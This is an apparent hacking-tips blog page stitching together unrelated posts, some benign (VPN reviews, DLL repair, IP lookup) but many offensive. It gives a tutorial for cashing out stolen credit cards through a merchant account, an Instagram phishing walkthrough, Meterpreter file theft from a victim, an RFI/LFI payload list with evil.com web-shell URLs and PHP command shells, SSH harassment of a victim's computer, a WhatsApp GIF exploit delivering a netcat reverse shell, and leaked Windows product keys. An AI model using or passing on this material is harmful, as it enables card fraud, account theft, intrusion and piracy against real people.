XLAR8 - All About tech | Tech terms

HOW TO CASH OUT PURCHASED CC ?

In this Tutorial i will teach you guys how to cashout DEBIT CARDS AND CREDIT CARDS BOUGHT FROM CC SHOPS INTO YOUR ACCOUNT, i promise to make this very simple for all so without being said let get started .....

Requirement

1. A Good Website cloned or Properly Setup
2. Domain registered email
3. Merchant Account
4. Dead Fullz : not including CC details just DOB and SSN
5. A US Checking Account or savings account : Only the routing number and account number is needed

so you can change the account at any time without problem since account name is not needed.

NOTE: It only works with US BANK ACCOUNT.

STEP BY STEP ON HOW TO CASH OUT CC 2020

What is Stripe?

Stripe is the easiest way to accept credit and debit card payments online.With Stripe, you can create exactly the payment experience you want in your website or mobile app,
and we handle everything from security to daily transfers to your bank account. You can get started immediately.

HOW DOES IT WORK

GO to Stripe.com and register for a merchant account with your website as business name

Note:
you must have an SSN or DOB to register the company its very easy to register next do not use a free email

to register as a merchant your account would be setup immediately and domain name will be confirmed since you used domain registered email.

there are detailed step to step guide there on how to integrate the payment form into your website

then you are ready to cashout your cvv both non vbv and vbv card work effectively worldwide cards also work effective.

Advantage over other processor you can charge ccv yourself on the dashboard of your stripe account without charging it through your website.

Payments are transferred into your bank account within 7days not like other processors that send payment in 30days.

NOTE : to be effective do not charge more than 300$ for US cvv and more than 500$ for International cvv.

Enjoy! Follow us for more...

How to hack instagram account ?

How to hack insta account

🎩Hack anyones social media account easy way (spam)🎩

On subscribers demand to hack social media accounts

Request Desktop site for using full Website

Step.1: Go to Z-shadow.co

Step.2: Sign Up' make sure you don't forget your username' Email and Password.

Step.3: choose what you want to hack. then on there tap on ENGLISH Option a small box will pop up' copy the link and send it to the person you wanna hack' tell him / her it's for free 2 Millions of Followers' if he logs in then hes hacked! Last Step: Now you just have to go to Z-Shadow and go to Total Victims' there you'll see the person's login details! Use at your own risk! its only for graduational purpose

Old and good method for noobs.

Enjoy! Follow us for more...

Best VPN Services for Windows & Why ?

Why need vpn ?

>The Microsoft Windows operating system is still the most popular on personal computers around the world. For this reason, it is a primary goal for hackers who want to steal users or gain access to personal information.

1) VPN will protect your computer and the data stored on it. There is a wide selection of VPN providers, some of which work better on Windows, others worse.

2) To make your choice easier, we’ll look at reviews of VPN providers on Windows and tell you which ones are the best.

3) If you are looking for a free VPN for your computer, there are some on Windows. You only need to understand that their work quality is not as high as that of the paid VPN services described in this article.

🦑What should a VPN on Windows have?

Windows app with user friendly interface
Reliable connection at high speeds
High level of security and privacy.
Clear logging policy with emphasis on confidentiality
Access popular streaming services
Access to torrents and P2P traffic

1) ExpressVPN

> Very high speeds

>Works with Netflix & iPlayer

>Efficient and easy application for Windows

>Advanced privacy features like split tunneling

>Servers in 94 countries with secure connections
Minuses

2) NordVPN

>High speeds

>Work with popular services like Netflix

>Application with user-friendly interface and settings

>Connect up to 6 devices simultaneously
Extensive server list

>Even if NordVPN was located in the United States or Great Britain, no entries are kept here. No information regarding users is stored and not collected, so they cannot be tracked.

>Thanks to this provider, content on Netflix and BBC iPlayer services is available from any country, and in terms of speed, NordVPN is one of the three fastest. In terms of support, there is no need to complain. 24/7 live chat support with quick and helpful answers.

>NordVPN is superior to ExpressVPN in terms of price, which is lower here. This makes the service one of the best in terms of price and quality.

3) IPVanish

>High speed global connectivity

>Works with popular apps like Netflix

>Powerful Windows program with solid privacy settings

>Lack of logs
Connect to 50 countries

This service does not maintain logs, although many users can remember the story of how this provider handed information to the authorities.

The appearance of the application is not as attractive as that of ExpressVPN and NordVPN. Its dark green colors give the program a technological look, not too friendly for beginners.

4) CyberGhost

High speeds
Easy Netflix Access
Simple and effective Windows application
Complete lack of logs
Connecting to servers in 87 countries

Written by UnderCode

Enjoy! Follow us for more...

Downloading files from a victim with Metasploit Meterpreter scripts ?

1) >The Meterpreter shell has a lot of neat features, including encryption of all the traffic between our attacking system and target. This prevents any interception and scanning of the data from intrusion detection systems (IDS).

2) Downloading individual files:

From the Meterpreter console it is possible to download individual files using the "download" command. Which is pretty straightforward and easy if you only want to download one file.
Meterpreter has a lot of useful inbuilt scripts to make post exploitation tasks such as data collection easier. To view the options, simply type "run" and then space-tab-tab to see the auto-completion options:

et's look at "run file_collector" first:

3) In the example below, I wanted to copy all the data from the E: drive of a Windows target, with the exception of a couple of directories that I am not interested in.
(In this actual example I am copying some files from a "Teach yourself C for Linux in 21 days" CD which is in the drive on the target system, onto my attacking system ;o)

3) To view the "run file_collector" options, use "-h"

meterpreter > run file_collector -h
Meterpreter Script for searching and downloading files that
match a specific pattern. First save files to a file, edit and
use that same file to download the choosen files.

🦑 OPTIONS:

-d Directory to start search on, search will be recursive.
-f Search blobs separated by a |.
-h Help menu.
-i Input file with list of files to download, one per line.
-l Location where to save the files.
-o Output File to save the full path of files found.
-r Search subdirectories.

meterpreter >

5) As you can see in the description, this is a three stage process. First, we create a file list, then we remove any files we don't want from the list, then we execute the download process.

6) Creating the file list

run file_collector -r -d e:\\ -f * -o /root/Courses/CforLinux/file.txt

We are running the collector recursively, looking for all files on the E: drive, and storing a list of these files in a "file.txt" file on my attacking system.

🦑As Meterpreter copies files over an encrypted connection, this can make the data transfer slower, so best to strip out any unneeded files.

Editing the file list

I don't need some of the directories on the target data drive, so I use grep to remove these, and make a new file "file.lst".
No
cat /root/Courses/CforLinux/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst2

(I am removing the \DDD \GCC \GDB \MAKE directories, which is not particularly relevant to you, just an example. I am chopping two carrots with one knife here, as this was useful to me at the time ;o)

🦑Downloading the file list

Once we have the edited file list we can simply start the file download process with the following command:

run file_collector -i /root/Courses/CforLinux/file.lst -l /root/Courses/CforLinux/

Written by undercode

What is the danger of the Reannewscomm.Com virus and how can it be removed ?

>What is Reannewscomm.com virus?

1) The Reannewscomm.com virus is a browser cracker that installs on the system without the user's knowledge.

2) The main goal of this unwanted software is to display illegal advertising in any possible way, including sudden redirection to malicious sites, displaying pop-ups and so on. At the same time, this process cannot be stopped even with the help of ad blockers, including AdGuard.

3) Initially, such activity may seem harmless, but displaying advertising messages is only a cover for gaining access to important personal information, which can later be used to steal passwords from electronic wallets and other confidential data of the PC owner.

🦑 How does the Reannewscomm.com virus work?

1) This malware acts by changing the settings in your web browser, which allows you to install a small utility in your Internet browser. The following is usually offered to buy something using e-wallets or debit cards, which, after entering data, scammers get unlimited access.

2) Moreover, “Reannewscomm.com” can use the “keylogger” tactics to capture information that you enter into the browser from the keyboard while working with legal sites, which can also be used by attackers on your behalf.

🦑How do I know if my computer is infected with the Reannewscomm.com virus?

1) Detecting Reannewscomm.com is quite simple, as its activity is accompanied by the display of a large amount of malicious advertising content, the constant appearance of pop-up browser windows, and so on.

2)In addition, you can immediately notice that your reliable ad blocker no longer works. Moreover, you can feel a significant drop in the speed of the browser and the entire system, as a result of the sudden sudden opening of many tabs.

3) Your antivirus program will often display a pop-up message stating that “The threat has been blocked.” If this happens, you should see the phrase “reannewscomm.com” in the corresponding warning.

4) Further, it is important to immediately remove this threat using your scanner, and if this fails, then you should try using alternative developers' antivirus software.

🦑Where did the Reannewscomm.com virus appear on my computer?
Browser crackers, such as Reannewscomm.com, are often installed along with free or pirated programs that users download voluntarily. Hackers who create this type of unwanted software usually embed it in legitimate software available for download on popular websites. In addition, such viruses may be hidden in notifications during installation with a request to approve the installation of additional components.

WRITTEN BY UNDERCODE

Enjoy! Follow us for more...

RFI/LFI Payload List :exploit

1) As with many exploits, remote and local file inclusions are only a problem at the end of the encoding. Of course it takes a second person to have it. Now this article will hopefully give you an idea of protecting your website and most importantly your code from a file iclusion exploit. I’ll give code examples in PHP format.

2) Let’s look at some of the code that makes RFI / LFI exploits possible.

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>

3) Now obviously this should not be used. The $ page entry is not fully cleared. $ page input is directed directly to the damn web page, which is a big “NO”. Always remove any input passing through the browser. When the user clicks on “File” to visit “files.php” when he visits the web page, something like this will appear.

http: //localhost/index.php? page = files.php

4) Now if no one has cleared the input in the $ page variable, we can have it pointed to what we want. If hosted on a unix / linux server, we can display the password as configuration files for shaded or uncleaned variable input.

5) Viewing files on the server is a “Local File Inclusion” or LFI exploit. This is no worse than an RFI exploit.

http: //localhost/index.php? page = .. / .. / .. / .. / .. / .. / etc / passwd
The code will probably return to / etc / passwd. Now let’s look at the RFI aspect of this exploit. Let’s get some of the codes we’ve taken before.

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>

6) Now suppose we write something like …

http: //localhost/index.php? page = http: //google.com/
Probably where the $ page variable was originally placed on the page, we get the google.com homepage. This is where the codder can be hurt. We all know what c99 (shell) can do, and if coders are careful, they may be included in the page, allowing users to surf through sensitive files and contacts at the appropriate time. Let’s look at something simpler that can happen on a web page. The faster and more dirty use of RFI exploitation is to your advantage. Now, create a file named “test.php” and put the following code in it and save it.

<? Php
passthru ($ _ GET [cmd]);
?>

7) Now this file is something you can use to your advantage to include it on a page with RFI exploitation. The passthru () command in PHP is very evil, and many hosts call it “out of service for security reasons”. With this code in test.php, we can send a request to the web page, including file inclusion exploit.

http: //localhost/index.php? page = http: //someevilhost.com/test.php

8) When the code makes a $ _GET request, we must provide a command to pass to passthru (). We can do something like this.

http: //localhost/index.php? page = http: //someevilhost.com/test.php? cmd = cat / etc / passwd

9) This unix machine will also extract the file / etc / passwd using the cat command. Now we know how to exploit RFI exploit, now we need to know how to hold it and make it impossible for anyone to execute the command, and how to include remote pages on your server. First, we can disable passthru (). But anything on your site can use it again (hopefully not). But this is the only thing you can do. I suggest cleaning the inputs as I said before. Now, instead of just passing variables directly to the page, we can use a few PHP-proposed structures within functions. Initially, chop () from perl was adapted to PHP, which removes whitespaces from an array. We can use it like this.

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = chop ($ _ GET [page]);
include ($ page);
?>

10) There are many functions that can clear string. htmlspecialchars () htmlentities (), stripslashes () and more. In terms of confusion, I prefer to use my own functions. We can do a function in PHP that can clear everything for you, here I’ve prepared something easy and quick about this course for you.
[3/31, 3:56 PM] +961 70 307 765: <? Php
function cleanAll ($ input) {
$ input = strip_tags ($ input);
$ input = htmlspecialchars ($ input);
return ($ input);
}
?>

11) Now I hope you can see what’s going on inside this function, so you can add yours. I would suggest using the str_replace () function and there are a lot of other functions to clear them. Be considerate and stop the RFI & LFI exploit frenzy!

Basic LFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
Interesting files to check out :

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
LFI / RFI Wrappers :
LFI Wrapper rot13 and base64 - php://filter case insensitive.

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

12) Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
LFI Wrapper ZIP :
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php
RFI Wrapper DATA with "" payload :
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
RFI Wrapper EXPECT :
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
XSS via RFI/LFI with "" payload :
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
LFI to RCE via /proc/*/fd :
Upload a lot of shells (for example : 100)
Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
LFI to RCE via Upload :
http://example.com/index.php?page=path/to/uploaded/file.png

Written by undercodeOfficial +961 70 307 765

Enjoy! Follow us for more...

What can I do on someone else’s PC using SSH

1) If you want to prove to someone that you have remote access to the device, or just want to convince someone that their computer is vulnerable, you can use SSH.

2) Distance action
If for you the fact that a PC can be hacked is clear and obvious, then for an average user it is not. Rather, he is inclined to attribute the strange behavior of his computer to errors, crashes, or other reasons independent of the attackers. Although with the help of SSH access, a hacker can easily create fake alerts and in every way mask his activity.

What can be done through SSH access

1) For example, we can run applications such as Firefox to go to any web page, working in full screen mode, or use several small browser windows. Most people associate spontaneous web page launching with a virus or adware, especially if most websites are about Viagra or casino, for example.

2) Then we can begin to "make noise." You can use speakers connected to a computer. If the victim thinks she is alone at home, then unexpectedly turned on sound from the computer can frighten her greatly. The same can be said of a computer that begins to squeak violently, as if it was about to explode.

3) If this is not enough, you can activate error messages that occupy the entire screen. By combining beeps and error messages, we can create fake problems that look very serious.

What do you need

1) You will need ready-made SSH-access to any computer. We will take an example for Ubuntu, but you can control most computers, including MacOS, using the same commands.

2) You also need to be connected to the same network as the computer you want to control. After you logged in to the target computer through SSH, you can start launching applications and perform any other actions remotely.

1) Configure Access and Launch Basic Applications
First you need to register a command so that everything we do appears on the remote computer that we logged in through SSH, and not on the local computer on which we logged in. Configure the display path with the following command:

> export DISPLAY =: 0.0

2) Now, by writing a simple firefox command via SSH, you will open a Firefox browser window on the remote computer.

But for our first example, let's open the xterm window , displaying network data that looks pretty troubling for a beginner. To make the situation worse, we will do it 10 times. Accordingly, there will be 10 open windows.

3) To do this, we will execute the command in a loop:

for i in {1..10}; do sudo xterm -maximize -e sudo tcpdump; done
In this case, we open the terminal window of the maximum size, and the -e command means that we execute sudo tcpdump in the xterm window that we run.

4) Calling, Whistling and Speech
Before we can reproduce any noise, we need to execute the following command in order to be able to control the speakers remotely.

>sudo modprobe pcspkr

5) Now we have many options! First, we can say any phrase through the computer using the say or espeak command .

say "I am a canadian randomware, I have not encrypted any files but would appreciate some change"
espeak "please give me quarters sorry to bother you"
We can schedule such messages so that they periodically go to chrontab.

6) We can use the beep to drive the user crazy. To use beep , install it with apt install beep .

7) After installation, look at the manual using man beep to evaluate its capabilities:

BEEP(1) General Commands Manual BEEP(1)

NAME
beep - beep the pc speaker any number of ways

🦑We can generate almost any noise with Beep. The following table with frequencies may come in handy:

Note Frequency
C 261.6
C# 277.2
D 293.7
D# 311.1
E 329.6
F 349.2
F# 370.0
G 392.0
G# 415.3
A 440.0
A# 466.2
B 493.9
C 523.2
In our case, we are going to do something terrible for the end user. The -f flag sets the frequency to 4000 kHz, the d flag sets the delay between the audio signals at 500 ms, and the -l flag sets the length of the audio signal per second. Finally, the -r flag repeats this terrible noise 10 times.

beep -f 4000 -D 500 -l 1000 -r 10

9) Awesome Error Messages

> notify-send 'WARNING' 'I AM CALLING THE INTERNET POLICE'
This message will pop up in the corner. Kinda boring. Instead, we can display a large bold alarm message with the whiptail command and run it in a full-screen window.

xterm -maximized -fullscreen -fa 'Monospace' -fs 19.31 -e whiptail --title "CRITICAL: ACTION CANNOT BE UNDONE" --msgbox "UNAUTHORIZED LOGIN! DATA SAFEGUARD SYSTEM WILL DESTROY THIS TERMINAL IN 10 SECONDS, STAY 30 FEET CLEAR TO AVOID BLAST" --topleft 23 79
NOW

10) Cron Tasks from Hell
Now we can start combining tasks and plan their automatic launch. We can check if there are any existing jobs in crontab with the -l flag, and then add a new job with the -e flag.

crontab -l
crontab -e
11) In the configuration window that opens, you can add a task for execution every 60 seconds according to the following formula.

12) In order for the computer to beep every 60 seconds, we can add this record and then press ctrl x and y to save the file.

* * * * * beep -f 300.7 -r 10 -d 50 -l 400

13) As soon as the file is saved, the computer will emit a sound signal with the given parameters every 60 seconds.

14) Completing Custom Tasks
If you have access to someone else’s computer using SSH, you can turn off any running process. This will lead to a sudden stop of the used application, and accordingly, the user will not be able to effectively use the computer. To find the process ID, we can use the top or htop commands . If you do not have htop installed , you can do this with the command below.

apt install htop
top
Tasks: 219 total, 1 running, 178 sleeping, 0 stopped, 0 zombie
%Cpu(s): 3.0 us, 0.4 sy, 0.0 ni, 95.6 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 4968836 total, 1431244 free, 1104324 used, 2433268 buff/cache
KiB Swap: 5138428 total, 5138428 free, 0 used. 3367804 avail Mem

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
31906 root 20 0 0 0 0 I 6.2 0.0 0:00.59 kworker/u16:1
32560 toor 20 0 41928 3880 3192 R 6.2 0.1 0:00.02 top
1 root 20 0 160212 9592 6816 S 0.0 0.2 0:02.35 systemd
2 root 20 0 0 0 0 S 0.0 0.0 0:00.01 kthreadd
4 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 kworker/0:0H
6 root 0 -20 0 0 0 I 0.0 0.0 0:00.00 mm_percpu_wq
7 root 20 0 0 0 0 S 0.0 0.0 0:01.33 ksoftirqd/0
8 root 20 0 0 0 0 I 0.0 0.0 0:09.13 rcu_sched
9 root 20 0 0 0 0 I 0.0 0.0 0:00.00 rcu_bh
10 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
11 root rt 0 0 0 0 S 0.0 0.0 0:00.03 watchdog/0
12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/0
13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuhp/1
14 root rt 0 0 0 0 S 0.0 0.0 0:00.03 watchdog/1

15) If I want to kill the process from above, I just take the PID and run the following command.

16) kill PID#
In the above example, I would run kill 32560 to terminate the top running process.

17) Putting It All Together
Now let's combine all that we have learned so that the end user gets a “vivid impression” from using their PC. Take a random beep and combine it with some bash commands to create many Firefox browser windows that open every 60 seconds and go to “Never Gonna Give You Up.”

for i in {1..10}; do beep -f 4000 -D 500 -l 1000 -r 10 & firefox -new-window

written by undercode +96170307765:

Enjoy! Follow us for more...

WhatsApp :- Generate payload !

Generate Payload

Auto install GCC (no harm command, you can see this is open-source)
Saving to .GIF file

sudo apt install git
Tool link https://gplinks.co/2WuR0zQC

cd WhatsRCE && bash start.sh

▪How Get Shell ?

You just send the .GIF file to victim user AS A DOCUMENT NOT IMAGES
And set the nc / netcat to port you set on the WhatsRCE tools {nc -lnvp your_port}
You can use the Social Engineering attack so that victims can be attracted to launch this exploit
tell the victim to open the gallery via whatsapp and send the victim to send any photos (no need, it's just got to the gallery no problem) after that a few seconds later you will receive a shell connection from the victim

How To Avoid This Attack?

Update your whatsapp to the latest version (Patched on Version 2.19.244)

how to receive any file including audio images and others from people we don't know
(Trick provided by Waseem Ali +92303 0445741)

Enjoy! Follow us for more...

Product keys for Windows 10

Windows 10 Home Edition
YTMG3-N6DKC-DKB77-7M9GH-8HVX7

Windows 10 Single Language
BT79Q-G7N6G-PGBYW-4YWX6-6F4BT

Windows 10 Education
YNMGQ-8RYV3-4PGQ3-C8XTP-7CFBY
NW6C2-QMPVW-D7KKK-3GKT6-VCFB2

Windows 10 Enterprise
CKFK9-QNGF2-D34FM-99QX2-8XC4K
NPPR9-FWDCX-D2C8J-H872K-2YT43
PBHCJ-Q2NYD-2PX34-T2TD6-233PK

Windows 10 Pro Serial Key
VK7JG-NPHTM-C97JM-9MPGT-3V66T
6P99N-YF42M-TPGBG-9VMJP-YKHCF
8N67H-M3CY9-QT7C4-2TR7M-TXYCV
W269N-WFGWX-YVC9B-4J6C9-T83GX

Windows 10 product key: Technical Preview for Consumer
334NH-RXG76-64THK-C7CKG-D3VPT

Windows 10 product number
VK7JG-NPHTM-C97JM-9MPGT-3V66T
W269N-WFGWX-YVC9B-4J6C9-T83GX
T44CG-JDJH7-VJ2WF-DY4X9-HCFC6

Key for Every kind of edition
8DVY4-NV2MW-3CGTG-XCBDB-2PQFM
NKJFK-GPHP7-G8C3J-P6JXR-HQRJR

2017 product keys for Windows 10
TX9XD-98N7V-6WMQ6-BX7FG-48Q99
TX9XD-98N7V-6WMQ6-BX7FG-H8Q99

Enjoy! Follow us for more...

How to fix all types of dll files missing error in windows ?

Fix Missing DLL files error
If DLL files are missing on your Windows 10/8/7 computer, the best ways to fix such errors are as follows:

Run the built-in System File Checker tool to replace missing or corrupted operating system files
Run the DISM tool and repair the Windows system image and fix a corrupted Windows Component Store
Repair or re-install the software if some application throws up this error
Copy the DLL file from another system and restore it on your PC, followed by re-registering the dll file
Download dll files from a 3rd-party site – Is that advisable?
Let us take a look at these in details.

1] The safest way to fix DLL file missing or corrupted errors thrown up by your Windows operating system, would be to run the built-in System File Checker, which will replace missing or corrupted system files.

To do this, on your Windows 10 computer, right-click on the Start button to open the WinX Menu and click on Command Prompt (Admin) link.

Now in the elevated CMD window, copy-paste the following command and hit Enter:

sfc /scannow
The scan may take 10 minutes, and once it completes successfully, you should restart your PC. Running sfc /scannow in Safe Mode or Boot Time could give better results.

This post will help you if you receive a Windows resource protection found corrupt files but was unable to fix them error message while running the scan.

2] If the issue is resolved, great! Else the next thing to do would be to Run DISM to repair the System Image. Again, in an elevated command prompt window, copy-paste the following command and hit Enter:

Dism /Online /Cleanup-Image /RestoreHealth
This checks for Windows component store corruption and restores good health. The scan may take around 15 minutes, and once it completes successfully, you should restart your PC.

This post will help you if DISM fails.

TIP: If you think this is too much, download use our FixWin and run the above SFC, and DISM scans with the click of a button.

3] If it is some installed software or application that is giving this error, all you need to do is re-install the software. You may uninstall the application that is giving the error from the Control Panel, restart your computer, then go to its official download page and download the latest setup file. Having done this, install the software. The installer will place all the required files on your PC including the DLL files. If the software offers an option to Repair the program, you may first opt to repair the installation and see if that helps.

4] Sometimes, a software that was meant to run on an older version of Windows, may require a specific version of a DLL file to run. If you face this issue, you should try and copy this DLL file from one of your other systems and replace it here in the proper Directory and see if that works for you. You may have to re-register the DLL file. At times the developers of that software may offer various versions of DLL files on their sites for download – you could download these.

5] Is there any good site from where you can download DLL files to restore them? There may be, but I would not advise using them really. The reason is simple. If you need to replace or restore DLL files, you can carry out any of the above-mentioned suggestions. That will ensure that you get genuine files from genuine sources. Moreover, most of the DLL files are copyright protected, and I am not sure if any dll download website has taken the permissions from the OS or software developers to host and distribute the files. And plus – how would you know the genuinity of the file? So that is a call you will have to take.

How to increase instagram followers using termux ?

Open Termux app

pkg install & pkg upgrade
apt update & apt upgrade
pkg install git
git clone https://github.com/thelinuxchoice/inshackle.git
cd inshackle
ls
bash inshackle.sh

Then type "Login id & password"

Then started to increase followers (+30 in hour)

To exit from this type"exit"[for two time]

Enjoy! Follow us for more...

How to do information gathering about a website ?

For kali linux :- ./starts-kali.sh

For parrot os:- ./starts-parrot.sh

Let’s start installing some tools for information gathering

Whois lookup
Whois lookup is one of the most important things to have, it gives details about the IP and domain name like who is the owner of the domain where it’s hosted, name servers, in some case email and phone number of the owner. if you use kali Linux or other Linux os whois lookup will be preinstalled in your system but for mobile, you have to install it by yourself to install it type the following command in your termux kali Linux or parrot.

apt install whois

Once it’s installed you can test it with the following command:

whois xlar8.blogspot.com

RedHawk
RedHawk is another great tool for information gathering, it allow to do soo many things like whois lookup, Cloudflare detection, IP address, cms detection like WordPress or blogger, banner grabbing, DNS lookup, etc. it’s a php based tool so we have to install php also, to install the RedHawk in your termux Linux follow the command below

git clone https://github.com/Tuhinshubhra/RED_HAWK
cd RED_HAWK
apt install php
apt install php-curl
apt install php-xml
php rhawk.php

Now with the above commands, everything will be installed and will start the RedHawk, once it starts you will need to enter the website and it will give you the list of all available options.

NMAP
Nmap is the most popular and powerful network scanner with different techniques, with the help of nmap one can bypass the firewall to find open services and ports on the target device, for pc based kali Linux or parrot os it will be preinstalled in your system but here as we are using termux for Linux we have to install it.

apt install nmap
nmap --help

With above command nmap will be installed in your system will show you the help to use it

DNSRECON
Dnsrecon is another great tool for DNS footprinting. it allow you to find AAA A TXT MX record for the target domain. it can be very helpful during DNS testing or vulnerability based on the information gathered from the DNS, installation is simple

apt install dnsrecon
dnsrecon --help
dnsrecon xlar8.blogspot.com

you can use DNS recon in the more advanced way with help command to see all the available options.

Sublist3r
Sublist3r is the most popular subdomain enumeration tool used by many penetration testers and bug bounty hunters. sublist3r is a python based tool for the subdomain enumeration. to install it we need python in our termux based Linux.

apt install python
apt install python-pip
git clone https://github.com/aboul3la/Sublist3r
cd Sublist3r
pip install -r requirements.txt
python sublist3r.py -d xlar8.blogspot.com -o subdomain.txt
pwd

with the above command, it will install the sublister, Now look at the last command which will scan for the subdomains for the particular domain and -o to save them with subdomain.txt namer in our current directory. and pwd to get the current directory. ( change the domain allabouthack don’t have any subdomain)
remember this because we will need it (subdomain.txt) for our next tool.

HTTPROBE
Httprobe is a very useful tool if you use a sublister for the subdomain. the problem with subdomain is they are too many in some case and some subdomain doesn’t work. here the httprobe tool comes, first you have saved the subdomain in a text file which we didi already in sublister as subdomain.txt file and httprobe will go through all the subdomain and check if they are listing for port 80 and 443.

git clone github.com/tomnomnom/httprobe
cd httprobe
apt install golang
go build main.go
mv main httprobe
cat /root/Sublist3r/subdomain.txt | ./httprobe -c 50

with the last command, cat will print all the subdomain for the file which we saved earlier in with file location | will grab the output from the cat command and then httprobe will be run on that output. and will print all the subdomain listing for 80 and 443 you can manually change the port if you think the target is not using the default port. check their Github page for more details.

With all above tools you can ger information about a website, just use help command under that tool,

Enjoy! Follow us for more...

How to stop someone from tracking your IP address ?

How to stop someone from tracking your IP address

Now that you know how easy it is to track someone’s IP address, it is only logical to be worried about someone else tracking yours.

Luckily, stopping someone from tracking your IP address is actually quite simple – if you know which tools to use and how to use them.

Moreover, hiding your IP address will let you access geo-blocked websites, circumvent IP bans, and generally stay anonymous online.

Connect to a VPN

Most likely the best and most convenient way for hiding or changing your IP address is to opt for a reliable VPN service. Besides this, a VPN can encrypt your internet traffic and allow you to safely exchange data with other users.

A VPN works by assigning a new IP address to users and preventing third parties from monitoring the user’s online activity. When you connect to a virtual private network, you will be assigned a new IP address that hides your real one.

While your real IP address is still used for connecting to a VPN, all other traffic will be tunneled through your VPN and thus connect only to your second, virtual IP address.

Make use of a proxy server

A proxy server is an excellent tool that acts as a bridge in your web traffic. It connects you to a server located in another location and hides your real IP.

However, even though proxies can come in handy when it comes to IP restrictions or bypassing geo-blocked content, they are not as effective a solution as a VPN. Proxies simply can’t compete with VPNs because they lack the many layers of protection that a VPN uses, as they neither encrypt your data nor remove any identifiable markers from it.

Enjoy! Follow us for more...

How to track an IP address ?

How to track an IP address

Since now you have the exact IP address of a person or website, it is time to trace it and find out its approximate location. There are numerous tools you can use for this, such as the following:

Ip-tracker.org – another website that can find the location of an IP address. In addition, it gives you the longitude and latitude as well as a Google map of the location. You just need to click the link under the map for a full satellite map layout.

Enjoy! follow us for more...

How to find a website’s IP address ?

How to find a website’s IP address

Sometimes, you may not want to track a person spamming or bothering you but instead you need to find a specific website’s IP address.

Finding a website’s IP address isn’t complicated at all and can be done both on Mac and Windows by using your computer’s built-in traceroute function.

Windows

To start, open the Start menu and type ‘command prompt’. Then, open the Command Prompt, enter ‘tracert’, press space, and type in your website’s address without the ‘www’. For example, to find Google’s IP address, you would type ‘tracert google.com’ into the Command Prompt.

The IP address will appear in brackets next to the ‘Tracing route to [website]’ line of text.

Pro tip: Make sure that you type in the correct extension for the website (.com, .org, .net, and so on). And don’t forget to press Enter in order to execute the command.

Mac

Mac users will first need to open Spotlight. To do this, click on the magnifying glass icon in the top-right corner of the screen. Next, open Network Utility by double-clicking on it.

From here, follow the next steps:

Click on the Traceroute tab at the top of the Network Utility window.
Enter the website’s address in the text box near the top of the window. For instance, finding Facebook’s IP address would include typing in ‘facebook.com’ in the text box. Again, no need for typing ‘https://’ or ‘www’.
Click on Trace – a blue button on the right side of the page.

The website’s IP address will show next to the ‘traceroute to [website]’ line of text.

Enjoy! Follow us for more...

How to find the IP address of an email sender ?

How to find the IP address of an email sender

Whenever you receive an email, you actually receive more than just the message. The email comes with headers that contain important data about the sender and where the email was sent from.

However, note that this won’t work if the sender uses an anonymous proxy server or if you receive an email sent from a Gmail account through a web browser, as Google hides the real IP address of the sender.

On the other hand, if someone sends you an email from their Gmail account through Outlook, Thunderbird, or Apple Mail, you will be able to discover the sender’s IP address.

Gmail

For finding IP addresses in Gmail, open the email message, click on the inverted triangle next to the Reply button, and select Show Original. This will display the email header.

Now look for Received: from, which will be followed by the IP address between the square brackets []. If there are more than one Received patterns, choose only the last one, as that will be the actual address of the sender.

Once you know the IP address, you can track it easily and you will learn how later in the article.

Hotmail

After you have logged into your Windows Live or Hotmail account, go to your Inbox, and search for the email you want to track. Once you right-click on it, you will see a drop-down menu, where the last option will be View message source. Select it to see the email header.

From there, you have a few available options:

In case you find a header with X-Originating-IP followed by the IP address, that is the sender’s IP
If that doesn’t work, look for Received: from followed by an IP address
If you find multiple Received: from headers, eliminate the ones with proxy.com

Yahoo! Mail

Last but not least, searching for an IP address in Yahoo! Mail begins with clicking on the received email message. Next, select the View Full Header option and look for Received: from followed by the IP address between the square brackets [].

That will most likely be the IP address of the sender. If there is more than one series of Received: from, choose only the IP address from the last pattern.

On the other hand, if there are no such patterns, select the first IP address in X-Originating-IP and track it.

Enjoy! Follow us for more...

How to find someone’s IP address on Facebook ?

How to find someone’s IP address on Facebook

Finding someone’s IP address on Facebook is easy and it all starts with you using the Facebook chat or Facebook Messenger app.

